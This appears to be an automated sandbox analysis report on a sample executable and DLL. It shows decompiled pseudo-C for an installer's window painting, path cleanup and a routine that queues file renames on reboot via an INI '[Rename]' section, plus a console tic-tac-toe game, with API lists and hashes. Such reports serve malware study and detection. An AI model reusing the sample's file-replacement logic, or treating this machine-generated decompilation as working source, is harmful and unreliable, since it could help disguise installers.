                                                                                • Instruction Fuzzy Hash: 3161A1B1A40209BFEB109F60DC45F6A7B69EB54715F108036FB05BA2D1C7B8E951CF98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00401000, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 90%
                                                                                			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x423e90;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, 0x423680, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x423e88;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}













                                                                                0x0040100a
                                                                                0x00401039
                                                                                0x00401047
                                                                                0x0040104d
                                                                                0x00401051
                                                                                0x0040105b
                                                                                0x00401061
                                                                                0x00401064
                                                                                0x004010f3
                                                                                0x00401089
                                                                                0x0040108c
                                                                                0x004010a6
                                                                                0x004010bd
                                                                                0x004010cc
                                                                                0x004010cf
                                                                                0x004010d5
                                                                                0x004010d9
                                                                                0x004010e4
                                                                                0x004010ed
                                                                                0x004010ef
                                                                                0x004010ef
                                                                                0x00401100
                                                                                0x00401105
                                                                                0x0040110d
                                                                                0x00401110
                                                                                0x00401112
                                                                                0x00401118
                                                                                0x0040111f
                                                                                0x00401126
                                                                                0x00401130
                                                                                0x00401142
                                                                                0x00401156
                                                                                0x00401160
                                                                                0x00401165
                                                                                0x00401165
                                                                                0x00401110
                                                                                0x0040116e
                                                                                0x00000000
                                                                                0x00401178
                                                                                0x00401010
                                                                                0x00401013
                                                                                0x00401015
                                                                                0x0040101f
                                                                                0x0040101f
                                                                                0x00000000

                                                                                APIs
                                                                                • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                                                • GetClientRect.USER32 ref: 0040105B
                                                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                • FillRect.USER32 ref: 004010E4
                                                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                                                • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                • DrawTextA.USER32(00000000,00423680,000000FF,00000010,00000820), ref: 00401156
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                • DeleteObject.GDI32(?), ref: 00401165
                                                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.232381303.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.232365938.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232391183.0000000000407000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232396290.0000000000409000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232409652.0000000000417000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232414737.0000000000422000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232423171.0000000000429000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232429022.000000000042C000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                • String ID: F
                                                                                • API String ID: 941294808-1304234792
                                                                                • Opcode ID: a16a50f16efb259b1f94ca86ef79a5d51e0f349a280e4e705ab109419a7a434d
                                                                                • Instruction ID: 87972a138d556bacb88ba9c7fcdf6f47da3ec758f00315b8b39b68d2b09e4b9a
                                                                                • Opcode Fuzzy Hash: a16a50f16efb259b1f94ca86ef79a5d51e0f349a280e4e705ab109419a7a434d
                                                                                • Instruction Fuzzy Hash: 6441BC71804249AFCB058FA4CD459BFBFB9FF44314F00812AF951AA1A0C378EA54DFA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040572B, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 144filememoryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 93%
                                                                                			E0040572B() {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t15;
				long _t16;
				int _t20;
				void* _t28;
				long _t29;
				intOrPtr* _t37;
				int _t43;
				void* _t44;
				long _t47;
				CHAR* _t49;
				void* _t51;
				void* _t53;
				intOrPtr* _t54;
				void* _t55;
				void* _t56;

				_t15 = E00405CFB(1);
				_t49 =  *(_t55 + 0x18);
				if(_t15 != 0) {
					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
					if(_t20 != 0) {
						L16:
						 *0x423f10 =  *0x423f10 + 1;
						return _t20;
					}
				}
				 *0x422608 = 0x4c554e;
				if(_t49 == 0) {
					L5:
					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x422080, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						_t43 = wsprintfA(0x421c80, "%s=%s\r\n", 0x422608, 0x422080);
						_t56 = _t55 + 0x10;
						E004059FF(_t43, 0x400, 0x422080, 0x422080,  *((intOrPtr*)( *0x423e90 + 0x128)));
						_t20 = E004056B4(0x422080, 0xc0000000, 4);
						_t53 = _t20;
						 *(_t56 + 0x14) = _t53;
						if(_t53 == 0xffffffff) {
							goto L16;
						}
						_t47 = GetFileSize(_t53, 0);
						_t7 = _t43 + 0xa; // 0xa
						_t51 = GlobalAlloc(0x40, _t47 + _t7);
						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
							L15:
							_t20 = CloseHandle(_t53);
							goto L16;
						} else {
							if(E00405629(_t51, "[Rename]\r\n") != 0) {
								_t28 = E00405629(_t26 + 0xa, 0x409330);
								if(_t28 == 0) {
									L13:
									_t29 = _t47;
									L14:
									E00405675(_t51 + _t29, 0x421c80, _t43);
									SetFilePointer(_t53, 0, 0, 0);
									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
									GlobalFree(_t51);
									goto L15;
								}
								_t37 = _t28 + 1;
								_t44 = _t51 + _t47;
								_t54 = _t37;
								if(_t37 >= _t44) {
									L21:
									_t53 =  *(_t56 + 0x14);
									_t29 = _t37 - _t51;
									goto L14;
								} else {
									goto L20;
								}
								do {
									L20:
									 *((char*)(_t43 + _t54)) =  *_t54;
									_t54 = _t54 + 1;
								} while (_t54 < _t44);
								goto L21;
							}
							E004059DD(_t51 + _t47, "[Rename]\r\n");
							_t47 = _t47 + 0xa;
							goto L13;
						}
					}
				} else {
					CloseHandle(E004056B4(_t49, 0, 1));
					_t16 = GetShortPathNameA(_t49, 0x422608, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						goto L5;
					}
				}
				return _t16;
			}





















                                                                                0x00405731
                                                                                0x00405738
                                                                                0x0040573c
                                                                                0x00405745
                                                                                0x00405749
                                                                                0x00405888
                                                                                0x00405888
                                                                                0x00000000
                                                                                0x00405888
                                                                                0x00405749
                                                                                0x00405755
                                                                                0x0040576b
                                                                                0x00405793
                                                                                0x0040579e
                                                                                0x004057a2
                                                                                0x004057c2
                                                                                0x004057c9
                                                                                0x004057d3
                                                                                0x004057e0
                                                                                0x004057e5
                                                                                0x004057ea
                                                                                0x004057ee
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004057fd
                                                                                0x004057ff
                                                                                0x0040580c
                                                                                0x00405810
                                                                                0x00405881
                                                                                0x00405882
                                                                                0x00000000
                                                                                0x0040582c
                                                                                0x00405839
                                                                                0x0040589e
                                                                                0x004058a5
                                                                                0x0040584c
                                                                                0x0040584c
                                                                                0x0040584e
                                                                                0x00405857
                                                                                0x00405862
                                                                                0x00405874
                                                                                0x0040587b
                                                                                0x00000000
                                                                                0x0040587b
                                                                                0x004058a7
                                                                                0x004058a8
                                                                                0x004058ad
                                                                                0x004058af
                                                                                0x004058bc
                                                                                0x004058bc
                                                                                0x004058c0
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004058b1
                                                                                0x004058b1
                                                                                0x004058b4
                                                                                0x004058b7
                                                                                0x004058b8
                                                                                0x00000000
                                                                                0x004058b1
                                                                                0x00405844
                                                                                0x00405849
                                                                                0x00000000
                                                                                0x00405849
                                                                                0x00405810
                                                                                0x0040576d
                                                                                0x00405778
                                                                                0x00405781
                                                                                0x00405785
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405785
                                                                                0x00405892

                                                                                APIs
                                                                                  • Part of subcall function 00405CFB: GetModuleHandleA.KERNEL32(?,?,00000000,0040310E,00000008), ref: 00405D0D
                                                                                  • Part of subcall function 00405CFB: LoadLibraryA.KERNELBASE(?,?,00000000,0040310E,00000008), ref: 00405D18
                                                                                  • Part of subcall function 00405CFB: GetProcAddress.KERNEL32(00000000,?), ref: 00405D29
                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000001,?,00000000,?,?,004054C0,?,00000000,000000F1,?), ref: 00405778
                                                                                • GetShortPathNameA.KERNEL32 ref: 00405781
                                                                                • GetShortPathNameA.KERNEL32 ref: 0040579E
                                                                                • wsprintfA.USER32 ref: 004057BC
                                                                                • GetFileSize.KERNEL32(00000000,00000000,00422080,C0000000,00000004,00422080,?,?,?,00000000,000000F1,?), ref: 004057F7
                                                                                • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 00405806
                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 0040581C
                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00421C80,00000000,-0000000A,00409330,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405862
                                                                                • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 00405874
                                                                                • GlobalFree.KERNEL32 ref: 0040587B
                                                                                • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 00405882
                                                                                  • Part of subcall function 00405629: lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405837,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405630
                                                                                  • Part of subcall function 00405629: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405837,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405660
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.232381303.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.232365938.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232391183.0000000000407000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232396290.0000000000409000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232409652.0000000000417000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232414737.0000000000422000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232423171.0000000000429000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232429022.000000000042C000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeLibraryLoadModulePointerProcReadSizeWritewsprintf
                                                                                • String ID: %s=%s$[Rename]
                                                                                • API String ID: 3772915668-1727408572
                                                                                • Opcode ID: 6ce23387ddadc87db43f6c97c7a21ac1972fd0182ebaaa54b5d3d4872b5ee6f8
                                                                                • Instruction ID: cbb5eccea056c114733d8b931c430fa22a01cf641a9920ade96d7ceca084e58d
                                                                                • Opcode Fuzzy Hash: 6ce23387ddadc87db43f6c97c7a21ac1972fd0182ebaaa54b5d3d4872b5ee6f8
                                                                                • Instruction Fuzzy Hash: 35412032A05B067BE3207B619C48F6B3A5CEB40754F004436FD05F62D2DA38A8018ABE
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 100012F0, Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 46processCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 70%
                                                                                			E100012F0(void* __ecx) {
				char _v8;
				void* _t12;
				void* _t14;

				_t18 = __ecx;
				system("cls");
				E10001620("\n--------MENU--------", __ecx);
				E10001620();
				E10001620("\n2 : Play with O", "\n1 : Play with X");
				E10001620();
				E10001620("\nEnter your choice:>", "\n3 : Exit");
				E100016E0("%d",  &_v8);
				 *0x10004028 = 1;
				_t12 = _v8 - 1;
				if(_t12 == 0) {
					 *0x1000201c = 1;
					 *0x10002018 = 0;
					return E100013B0(_t18);
				} else {
					_t14 = _t12 - 1;
					if(_t14 == 0) {
						L5:
						 *0x1000201c = 0;
						 *0x10002018 = 1;
						return E10001710(__eflags);
					} else {
						if(_t14 == 1) {
							exit(1);
							goto L5;
						} else {
							return E100012F0(_t18);
						}
					}
				}
			}






                                                                                0x100012f0
                                                                                0x100012f9
                                                                                0x10001304
                                                                                0x1000130e
                                                                                0x10001318
                                                                                0x10001322
                                                                                0x1000132c
                                                                                0x1000133a
                                                                                0x10001345
                                                                                0x1000134f
                                                                                0x10001352
                                                                                0x1000138c
                                                                                0x10001396
                                                                                0x100013a8
                                                                                0x10001354
                                                                                0x10001354
                                                                                0x10001357
                                                                                0x1000136f
                                                                                0x1000136f
                                                                                0x10001379
                                                                                0x1000138b
                                                                                0x10001359
                                                                                0x1000135c
                                                                                0x10001369
                                                                                0x00000000
                                                                                0x1000135e
                                                                                0x10001366
                                                                                0x10001366
                                                                                0x1000135c
                                                                                0x10001357

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.235794772.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 00000000.00000002.235775448.0000000010000000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.235800984.0000000010003000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.235807350.0000000010004000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.235820043.0000000010006000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: _printf$exitsystem
                                                                                • String ID: --------MENU--------$1 : Play with X$2 : Play with O$3 : Exit$Enter your choice:>$cls
                                                                                • API String ID: 317515175-593122841
                                                                                • Opcode ID: 3345c42979220453bdd50e50fa1c2aa8a2194cfae65d56ff0ff89148076b7b1b
                                                                                • Instruction ID: bda8cf136084e1d184602b3d75173bfecf8ebc5c2b70b7cff3f5374461dc01cd
                                                                                • Opcode Fuzzy Hash: 3345c42979220453bdd50e50fa1c2aa8a2194cfae65d56ff0ff89148076b7b1b
                                                                                • Instruction Fuzzy Hash: 2B018639540104AAF300DFE48CDABEF3654EB063D6F044244FA085661EDBB3AB549BE7
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 100013B0, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 71COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 55%
                                                                                			E100013B0(void* __ecx) {
				signed int _v8;
				signed int _t16;
				signed int _t32;
				void* _t34;
				signed int _t35;
				void* _t37;

				_t31 = __ecx;
				_push(__ecx);
				if( *0x10004028 > 9) {
					E10001210(0x1e, 0x14);
					E10001620();
					_t37 = _t37 + 0xc;
					__imp___getch("Game Draw");
					exit(0);
				}
				E10001100();
				0x10002004->X = 0x12001e;
				SetConsoleCursorPosition(GetStdHandle(0xfffffff5),  *0x10002004);
				E10001620("Your Turn :> ", _t34);
				E100016E0("%d",  &_v8);
				_t35 = _v8;
				if( *((intOrPtr*)(_t35 * 4 + E10004000)) != 2) {
					E100013B0(_t31);
					_t35 = _v8;
				}
				if(_t35 == E100014C0( *0x1000201c)) {
					E100011D0(_t35);
					E10001100();
					E10001210(0x1e, 0x14);
					E10001620();
					__imp___getch("Player Wins");
					exit(0);
				}
				_t32 =  *0x10004028; // 0x1
				_t16 = _t32 & 0x80000001;
				if(_t16 < 0) {
					_t16 = (_t16 - 0x00000001 | 0xfffffffe) + 1;
				}
				asm("sbb eax, eax");
				 *((intOrPtr*)(_t35 * 4 + E10004000)) = ( ~_t16 & 0xfffffffe) + 5;
				 *0x10004028 = _t32 + 1;
				E10001100();
				return E10001710(( ~_t16 & 0xfffffffe) + 5);
			}









                                                                                0x100013b0
                                                                                0x100013b3
                                                                                0x100013bb
                                                                                0x100013c1
                                                                                0x100013cb
                                                                                0x100013d0
                                                                                0x100013d3
                                                                                0x100013db
                                                                                0x100013db
                                                                                0x100013e2
                                                                                0x100013e7
                                                                                0x10001400
                                                                                0x1000140b
                                                                                0x10001419
                                                                                0x1000141e
                                                                                0x1000142c
                                                                                0x1000142e
                                                                                0x10001433
                                                                                0x10001433
                                                                                0x10001446
                                                                                0x10001449
                                                                                0x1000144e
                                                                                0x10001457
                                                                                0x10001461
                                                                                0x10001469
                                                                                0x10001471
                                                                                0x10001471
                                                                                0x10001477
                                                                                0x1000147f
                                                                                0x10001484
                                                                                0x1000148a
                                                                                0x1000148a
                                                                                0x1000148d
                                                                                0x10001496
                                                                                0x1000149d
                                                                                0x100014a3
                                                                                0x100014b1

                                                                                APIs
                                                                                • _printf.MSPDB140-MSVCRT ref: 100013CB
                                                                                • _getch.MSVCRT ref: 100013D3
                                                                                • exit.MSVCRT ref: 100013DB
                                                                                • GetStdHandle.KERNEL32(000000F5,?,?,?,100013A5), ref: 100013F9
                                                                                • SetConsoleCursorPosition.KERNEL32(00000000,?,?,?,100013A5), ref: 10001400
                                                                                • _printf.MSPDB140-MSVCRT ref: 1000140B
                                                                                • _printf.MSPDB140-MSVCRT ref: 10001461
                                                                                • _getch.MSVCRT ref: 10001469
                                                                                • exit.MSVCRT ref: 10001471
                                                                                  • Part of subcall function 10001210: GetStdHandle.KERNEL32(000000F5), ref: 1000122F
                                                                                  • Part of subcall function 10001210: SetConsoleCursorPosition.KERNEL32(00000000), ref: 10001236
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.235794772.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 00000000.00000002.235775448.0000000010000000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.235800984.0000000010003000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.235807350.0000000010004000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.235820043.0000000010006000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: _printf$ConsoleCursorHandlePosition_getchexit
                                                                                • String ID: Game Draw$Player Wins$Your Turn :>
                                                                                • API String ID: 1066838134-2104098960
                                                                                • Opcode ID: b155eace100a690f48f9dbe6cbb78f7e082a4c9d88f14c03805b58dcc2421941
                                                                                • Instruction ID: 2acccc87f38231f52a74b61973e5fa84de6d8dbf79db5b04d366033b418e6069
                                                                                • Opcode Fuzzy Hash: b155eace100a690f48f9dbe6cbb78f7e082a4c9d88f14c03805b58dcc2421941
                                                                                • Instruction Fuzzy Hash: C821057A940124A7F700EBB48D8BBCE3368EB093D2F040210F716A21AEDB72A5408767
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 10001100, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 61COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 36%
                                                                                			E10001100() {
				short _t3;
				intOrPtr _t13;
				short _t16;
				signed int _t17;
				void* _t18;
				void* _t20;

				_t3 = 0x23;
				_t16 = 9;
				do {
					0x10002004->X = _t3;
					 *0x10002006 = _t16;
					SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0x10002004->X);
					_push("|       |");
					E10001620();
					_t16 = _t16 + 1;
					_t18 = _t18 + 4;
					_t3 = 0x23;
				} while (_t16 < 0x11);
				0x10002004->X = 0xb001c;
				SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0x10002004->X);
				E10001620();
				0x10002004->X = 0xe001c;
				SetConsoleCursorPosition(GetStdHandle(0xfffffff5),  *0x10002004);
				E10001620("-----------------------", "-----------------------");
				_t20 = _t18 + 8;
				_t17 = 1;
				do {
					_t13 =  *((intOrPtr*)(_t17 * 4 + E10004000));
					if(_t13 != 3) {
						if(_t13 == 5) {
							_push(_t17);
							_push(0x4f);
							goto L7;
						}
					} else {
						_push(_t17);
						_push(0x58);
						L7:
						_t13 = E10001650();
						_t20 = _t20 + 8;
					}
					_t17 = _t17 + 1;
				} while (_t17 < 0xa);
				return _t13;
			}









                                                                                0x10001107
                                                                                0x10001114
                                                                                0x10001120
                                                                                0x10001120
                                                                                0x10001126
                                                                                0x10001138
                                                                                0x1000113a
                                                                                0x1000113f
                                                                                0x10001144
                                                                                0x10001145
                                                                                0x10001148
                                                                                0x1000114d
                                                                                0x10001152
                                                                                0x10001167
                                                                                0x1000116e
                                                                                0x10001176
                                                                                0x1000118b
                                                                                0x10001192
                                                                                0x10001197
                                                                                0x1000119a
                                                                                0x100011a0
                                                                                0x100011a0
                                                                                0x100011aa
                                                                                0x100011b4
                                                                                0x100011b6
                                                                                0x100011b7
                                                                                0x00000000
                                                                                0x100011b7
                                                                                0x100011ac
                                                                                0x100011ac
                                                                                0x100011ad
                                                                                0x100011b9
                                                                                0x100011b9
                                                                                0x100011be
                                                                                0x100011be
                                                                                0x100011c1
                                                                                0x100011c2
                                                                                0x100011ca

                                                                                APIs
                                                                                • GetStdHandle.KERNEL32(000000F5,?,?,?,100013E7,?,?,?,100013A5), ref: 10001135
                                                                                • SetConsoleCursorPosition.KERNEL32(00000000,?,?,?,100013E7,?,?,?,100013A5), ref: 10001138
                                                                                • _printf.MSPDB140-MSVCRT ref: 1000113F
                                                                                • GetStdHandle.KERNEL32(000000F5,100013A5), ref: 10001164
                                                                                • SetConsoleCursorPosition.KERNEL32(00000000), ref: 10001167
                                                                                • _printf.MSPDB140-MSVCRT ref: 1000116E
                                                                                • GetStdHandle.KERNEL32(000000F5), ref: 10001188
                                                                                • SetConsoleCursorPosition.KERNEL32(00000000), ref: 1000118B
                                                                                • _printf.MSPDB140-MSVCRT ref: 10001192
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.235794772.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 00000000.00000002.235775448.0000000010000000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.235800984.0000000010003000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.235807350.0000000010004000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.235820043.0000000010006000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: ConsoleCursorHandlePosition_printf
                                                                                • String ID: -----------------------$-----------------------$| |
                                                                                • API String ID: 1663292651-3813270350
                                                                                • Opcode ID: 82e6877025d259c47c3fa9dd78ca803a6d70f5b5f60b90db9591296a94b9d45a
                                                                                • Instruction ID: 807742b42fdf8da0946b4310985154694f980b23dbd2444a18e5d3e61f5b6bff
                                                                                • Opcode Fuzzy Hash: 82e6877025d259c47c3fa9dd78ca803a6d70f5b5f60b90db9591296a94b9d45a
                                                                                • Instruction Fuzzy Hash: E411F9B6D012746AFA10EB55ACC9FCB3A58EB453E4F151220FB14932BFD6359840C7A6
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00405C3B, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00405C3B(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E0040553D(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E004054FB("*?|<>/\":", _t5))) == 0) {
							E00405675(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                                                0x00405c3d
                                                                                0x00405c45
                                                                                0x00405c59
                                                                                0x00405c59
                                                                                0x00405c5f
                                                                                0x00405c6c
                                                                                0x00405c6c
                                                                                0x00405c6d
                                                                                0x00405c6f
                                                                                0x00405c73
                                                                                0x00405c75
                                                                                0x00405c7e
                                                                                0x00405c80
                                                                                0x00405c9a
                                                                                0x00405ca2
                                                                                0x00405ca2
                                                                                0x00405ca7
                                                                                0x00405ca9
                                                                                0x00405cab
                                                                                0x00405caf
                                                                                0x00405cb0
                                                                                0x00405cb3
                                                                                0x00405cbb
                                                                                0x00405cbd
                                                                                0x00405cc1
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405cc7
                                                                                0x00405ccc
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405ccc
                                                                                0x00405cd1

                                                                                APIs
                                                                                • CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\h8lD4SWL35.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 00405C93
                                                                                • CharNextA.USER32(?,?,?,00000000), ref: 00405CA0
                                                                                • CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\h8lD4SWL35.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 00405CA5
                                                                                • CharPrevA.USER32(?,?,"C:\Users\user\Desktop\h8lD4SWL35.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 00405CB5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.232381303.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.232365938.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232391183.0000000000407000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232396290.0000000000409000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232409652.0000000000417000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232414737.0000000000422000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232423171.0000000000429000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232429022.000000000042C000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Char$Next$Prev
                                                                                • String ID: "C:\Users\user\Desktop\h8lD4SWL35.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                • API String ID: 589700163-3726442982
                                                                                • Opcode ID: 4f7e6b593bf5111f8c88569e024ed8da225a47510dabf73a0e077f0aace03009
                                                                                • Instruction ID: a7afd247c92bc784a78596703f4c1fca9c31ca8b0da90ec588ca87fae4212040
                                                                                • Opcode Fuzzy Hash: 4f7e6b593bf5111f8c88569e024ed8da225a47510dabf73a0e077f0aace03009
